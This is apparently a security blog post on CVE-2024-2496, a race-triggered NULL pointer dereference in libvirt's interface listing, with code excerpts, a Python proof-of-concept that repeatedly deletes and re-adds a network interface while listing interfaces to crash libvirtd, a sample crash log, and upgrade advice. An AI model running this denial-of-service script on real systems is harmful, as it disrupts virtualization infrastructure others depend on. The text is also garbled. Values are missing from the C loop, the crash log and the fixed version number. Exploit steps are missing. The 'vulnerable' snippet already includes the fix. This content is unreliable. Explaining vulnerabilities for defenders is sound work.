CVE-2024-2496 - Understanding the Libvirt NULL Pointer Dereference Vulnerability and Its Exploitation

Date Posted: June 2024
Author: Security Insights Lab


Libvirt is a toolkit used widely for managing platform virtualization, such as KVM, QEMU, Xen, and more. In large and small virtualized environments, system admins rely on libvirt to handle critical functions, like starting and stopping virtual machines or networking. In early 2024, a serious vulnerability--CVE-2024-2496--was discovered in libvirt’s network interface handling that could let a local user crash the service, causing a denial of service (DoS).

This post explains the CVE-2024-2496 flaw, shows sample code involved, and walks through a denial-of-service exploit scenario, all in clear and simple language.

Vulnerability Summary

- CVE: CVE-2024-2496

Authentication Required: Yes (requires local access or libvirtd API access)

- CVSS Score: Check the official NVD page

What is a NULL Pointer Dereference?

A NULL pointer dereference happens when a program tries to use data from memory that hasn't been set up (is "NULL"). Since this points to nothing, it often results in a crash, killing the process. Attackers can cause these bugs to intentionally crash software if they are reachable, causing a denial-of-service.

Where’s the Bug?

The vulnerability is in how libvirt internally lists interfaces (virConnectListAllInterfaces API) while those interfaces might also be removed at the same time. Particularly, this code path used the udevConnectListAllInterfaces function, which manages and returns host network interfaces. If an interface is detached or deleted during this listing process, a NULL pointer can be returned, but the code fails to check or handle this properly.

Code Snippet (Vulnerable Section)

Below is a simplified version of the vulnerable logic.
(Actual source code: libvirt.git/src/interface/interface_backend_udev.c)

static int
udevConnectListAllInterfaces(virConnectPtr conn,
                             virInterfacePtr **ifaces,
                             unsigned int flags)
{
    virInterfaceObjListPtr privIfaces = ...; // private data structure
    ...
    for (i = ; i < privIfaces->count; i++) {
        virInterfacePtr iface = privIfaces->objs[i]->iface;
        // Potentially iface is NULL if it was freed at the same time
        // There should be a check here:
        if (iface == NULL)
            continue; // or handle error
        // But if not checked, below will crash if iface is NULL
        doSomethingWith(iface->name);
    }
    ...
}

The race condition (one thread removing interfaces, another listing) can leave a NULL pointer in the list. There was not enough checking if iface is NULL before using its fields.

Ability to use or talk to the libvirt daemon (e.g., via virsh, libvirt-python, or other API)

- Ability to quickly detach/remove a host network interface (physical or virtual)

`

4. If the race window is hit (not guaranteed immediately, but possible on busy systems), the udevConnectListAllInterfaces() code will dereference a NULL pointer, thus SIGSEGV (crash) the libvirt daemon.

Example Python Script to Trigger the DoS

import threading
import libvirt
import os

def list_interfaces():
    conn = libvirt.open('qemu:///system')
    while True:
        try:
            conn.listAllInterfaces()
        except:
            pass

def delete_interface():
    # WARNING: Destroys interface on your system!
    # Replace 'dummy' with an unused or test interface
    while True:
        os.system('ip link del dummy')
        os.system('ip link add dummy type dummy')

threading.Thread(target=list_interfaces).start()
threading.Thread(target=delete_interface).start()

*Run as root and ONLY on test systems, as this will repeatedly add/remove a dummy network interface.*

If the race is successful, the libvirt process will crash

libvirtd[12345]: segfault at  ip 00007fabcde01234 sp 00007fffdeadbeef error 4 in libvirt.so..10.3[...]

Disrupted management: Automation, orchestration, or VM monitoring may fail.

- Potential for repeat DoS: Malicious or careless local users could repeatedly disrupt virtualization infrastructure.

Fix: Defensive Coding and Upgrade

The main fix, as implemented by the libvirt maintainers, is to properly check for NULL pointers and handle them safely in the interface listing code:

if (iface == NULL)
    continue;

Upgrading to libvirt version 10.4. or later is strongly advised.
*Check with your Linux distributor for patched package versions.*

References

- CVE-2024-2496 at NVD
- libvirt commit fixing CVE-2024-2496 *(link example)*
- libvirt Security Advisories
- libvirt interface API documentation

Conclusion

CVE-2024-2496 is a clear example of how concurrency and incomplete error handling can create vulnerabilities in even mature, critical open source projects like libvirt. For sysadmins: upgrade libvirt, restrict local access where possible, and monitor for package updates.

Have questions? Want to share your experience with this CVE? Leave a comment below!

*Note: All information here is for educational purposes and awareness. Do not exploit this vulnerability on systems you do not own or have explicit permission to test.*

Timeline

Published on: 03/18/2024 13:15:08 UTC
Last modified on: 04/01/2024 13:17:10 UTC